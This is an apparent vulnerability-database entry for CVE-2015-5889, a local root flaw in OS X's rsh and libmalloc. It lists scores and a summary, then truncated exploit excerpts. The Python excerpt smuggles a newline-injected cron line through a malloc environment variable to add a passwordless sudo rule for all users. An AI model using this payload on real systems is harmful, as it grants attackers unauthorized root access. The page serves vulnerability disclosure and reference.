CVE-2015-5889

Published: 09/10/2015 Updated: 24/12/2016
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 730
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

rsh in the remote_cmds component in Apple OS X prior to 10.11 allows local users to obtain root privileges via vectors involving environment variables.

Vulnerable Product

apple mac os x

Exploits

The default root-suid binary /usr/bin/rsh on Mac OS X uses execv() in an insecure manner. /usr/bin/rsh will invoke /usr/bin/rlogin if launched with only a host argument, without dropping privileges or clearing the environment. This exploit will pass "MallocLogFile" to /usr/bin/rsh, which is then passed on to rlogin and interpreted by libmalloc to c ...
# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root
# tested on osx 10.9.5 / 10.10.5
# jul/2015
# by rebel
import os,time,sys
env = {}
s = os.stat("/etc/sudoers").st_size
env['MallocLogFile'] = '/etc/crontab'
env['MallocStackLogging'] = 'yes'
env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" &g ...
##
# This module requires Metasploit: metasploit.com/download
# Current source: github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Local
  Rank = NormalRanking
  include Msf::Post::OSX::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  def initialize(info = {} ...